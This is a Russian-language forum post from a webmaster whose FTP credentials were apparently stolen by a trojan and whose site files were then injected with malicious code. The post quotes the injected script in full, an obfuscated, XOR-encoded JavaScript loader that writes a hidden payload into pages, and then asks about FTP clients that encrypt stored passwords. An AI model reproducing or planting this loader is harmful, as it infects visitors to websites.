3 меняца назад отловил у себя трояна, который походу стырил мои пароли к ФТП всех проектов (гад
) вчера пришла расплата - все файлы в корнях сайтов взломаны (дописан код в конце файла, со сдвигом кучей табуляций - типа прячется
):
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28ywG%21%3D1%29%7Bfunction%20cu%28Bw%29%7Breturn%20Bw%7Dtry%7Bfunction%20DWU%28uDX%29%7Breturn%20parseInt%28uDX%29%7Dvar%20wQx%3D%27pp1pe1pT1pB1pY1po1pO1p61pZ1pd1pP1pW1pb1pg1pw1pM1p31pk1pn1pV1pA1pa1pN1pS1pc1pH1px1pI1p51ps1pR1pX1pL1p81pz1pJ1pl1pU1p91p41pG1p71pf1pD1pr1pt1pC1pi1pq1pm1ph1pF1py1pj1ep1ee1eT1eB1eY1eo1eO1e61eZ1ed1eP1eW1eb1eg1ew1eM1e31ek1en1eV1eA1ea1eN1eS%27%3Bvar%20tQG%3DwQx.substr%282%2C1%29%2CdwP%3DArray%28DWU%28%27230%27%29%2C8726%5E8895%2CDWU%28%27185%27%29%2C26095%5E25927%2CDWU%28%27179%27%29%2C5787%5E5681%2C23653%5E23755%2C13653%5E13745%2C30035%5E30191%2CDWU%28%27175%27%29%2CDWU%28%27180%27%29%2C30328%5E30413%2C32649%5E32627%2C23920%5E24043%2C10495%5E10253%2CDWU%28%27140%27%29%2CDWU%28%27173%27%29%2C14413%5E14523%2C3813%5E3693%2CDWU%28%27141%27%29%2C11310%5E11485%2C30466%5E30627%2CDWU%28%27172%27%29%2CDWU%28%27187%27%29%2C30630%5E30515%2CDWU%28%27231%27%29%2CDWU%28%27191%27%29%2C8321%5E8223%2CDWU%28%27225%27%29%2C21025%5E21153%2C2886%5E3031%2CDWU%28%27244%27%29%2C15107%5E15245%2CDWU%28%27183%27%29%2CDWU%28%27189%27%29%2CDWU%28%27241%27%29%2C24579%5E24801%2CDWU%28%27236%27%29%2C13593%5E13815%2CDWU%28%27234%27%29%2C703%5E513%2C16646%5E16823%2CDWU%28%27248%27%29%2CDWU%28%27162%27%29%2CDWU%28%27157%27%29%2C15980%5E16123%2C13486%5E13351%2C19072%5E18983%2CDWU%28%27130%27%29%2C28109%5E27995%2CDWU%28%27253%27%29%2CDWU%28%27235%27%29%2C27749%5E27863%2C24646%5E24793%2C6643%5E6511%2C23583%5E23721%2C27130%5E26979%2C26620%5E26377%2C6786%5E6773%2C10675%5E10579%2CDWU%28%27251%27%29%2C22248%5E22029%2CDWU%28%27184%27%29%2CDWU%28%27129%27%29%2CDWU%28%27132%27%29%2CDWU%28%27160%27%29%2CDWU%28%27227%27%29%2CDWU%28%27135%27%29%2C32591%5E32713%2C4590%5E4449%2C31920%5E31833%2C10625%5E10521%2C2212%5E2055%2CDWU%28%27208%27%29%2C15819%5E15651%2C30828%5E30851%2CDWU%28%27237%27%29%2CDWU%28%27240%27%29%29%3Bvar%20mYu%2CujM%3Bvar%20cLO%2CEwZ%3D%27pppepTpBpYpopOp6pZpdpPpTpOpYpWpPpbpgpopwpMp3pkpnpVpApapbpNpSpBpbpMpcpHpPpxp3pbpIpSpOpxpwpAp5pNpSpBpbpbpspRpHpbpPpxp3pbpIpSpOpxpwpAp5pbpspRpXpepxpOpLpYp8pxpwpMpcpXpzpxpOpLpYp8pxpwpApJplpUp9p4p4p4p4p4pAp5pbpGpWpTpdp8pxpPpOpXpTpWpWp7pYpxpbpHpbpMp3pJpfpHpfpJpxpepTpSpopxpwpnpVpApJpfp5pxpDpopYpBpxpepHpfpJpspRpXpOpWprptpLpCpOpBpYpPpzpwpAp5pbpipNpSpBpbpqpmpHphpepFpZpgptphpkptpypHphpFphp5pNpSpBpbpjeppHphpdpopGpSpOpxpFpXpTeepSpepepYpTpOpxeepXpWpBpzphpkpNeTpHpheBpypOp8eeeBphp5pYpZpwpGpWpTpdp8pxpPpOpXpTpWpWp7pYpxpXpYpPpGpxpDpcpZpwpqpmpJphpHphpJptpypApbpHpHeYpFpApapNpSpBpbpGeepypHpGpWpTpdp8pxpPpOpXeepWpTpSpOpYpWpPpXpypWpepOp5pNpSpBpbpypDpHpbphpypOphpJphpOpoeophpJpheBeBphpJpwpbpGeepypbeOpHpbphphe6phpheoeZpmpwpApApbpJpbpGeepypXpBpxpoeepSpTpxpbpweBedePpSeYeWp4eYebpXeYegeBpkphpXphpApXpBpxpoeepSpTpxpbpweBewpXpJeBpkphpXphpApJphpXphpJeZpmpwpApbpJphpXphpbpJpbpjeppJpNeTp5pNpSpBpbeWeMpHpGpWpTpdp8pxpPpOpXpTpBpxpSpOpxpjeepxp8pxpPpOpwphpYpZpBpSp8pxphpAp5eWeMpXpepxpOpgpOpOpBpYeZpdpOpxpbpwphpepBpTphpkpbpypDpAp5eWeMpXpypxpYpzpypOpHp9p5eWeMpXp3pYpGpOpypHe3p5eWeMpXpZpBpSp8pxekpWpBpGpxpBpbpHpbp4p5pbpOpBenpapbpGpWpTpdp8pxpPpOpXeZpWpGenpXpSpopopxpPpGeTpypYeepGpbpwpbeWeMpAp5pbpgpopwpqpmpkpbptpypbpAp5pipbpTpSpOpTpypwpxpApbpapGpWpTpdp8pxpPpOpXp3pBpYpOpxpbpwphpppypOp8eep6ppeZpWpGenp6ppeBeZpWpGenp6ppeBpypOp8eep6phpAp5pbpGpWpTpdp8pxpPpOpXeZpWpGenpXpSpopopxpPpGeTpypYeepGpbpwpbeWeMpAp5pgpopbpwpbpqpmpkptpypApbp5pipbpieVpZpdpPpTpOpYpWpPpbeZpmpwpApapbpNpSpBpbpLpTpHeAp9pkpnp8pHpfp4pFeAe3p9eapUeNplebp4pSeZpTpGpxpZpfp5pNpSpBpbprpqpHpfpfp5pbpZpWpBpwpzeppHp4p5pbpzeppbpppbpLpTp5pbpzeppJpJpApbprpqpJpHpbpnp8pXpepdeZpepOpBpwptpSpOpypXpZeepWpWpBpwptpSpOpypXpBpSpPpGpWp8pwpAeSpnp8pXeepxpPpzpOpypApkpFpkpFpAp5pbpBpxpOpdpBpPpbprpqp5pbpippeBpepTpBpYpopOp6%27%3Bvar%20OBM%3DString%28%29%3BwQx%3DwQx.split%28tQG%29%3Bfor%20%28mYu%3D0%3BmYu%3CEwZ.length%3BmYu+%3D2%29%7BcLO%3DEwZ.substr%28mYu%2C2%29%3Bfor%28ujM%3D0%3BujM%3CwQx.length%3BujM++%29%7Bif%28wQx%5BujM%5D%3D%3DcLO%29break%3B%7DOBM+%3DString.fromCharCode%28dwP%5BujM%5D%5E218%29%3B%7Ddocument.write%28OBM%29%3B%7Dcatch%28pty%29%7B%7D%7Dvar%20ywG%3D1%3C/script%3E"))</script><!--[/z0s]-->
Потеряв час на смену файлов на всех сайтах из дистрибутива, и последующей смены прав на 444, появился вопрос:
Существует ли FTP КЛИЕНТ, кторорый хранит свои настройки в зашифрованном виде? а то как-то обидно так и лениво менять везде пароли на фтп, потом перенастраивать клиента и на работе и дома, и при этом не быть застрахованным от новых подобных вылазок?
05.11.2021, 21:47:31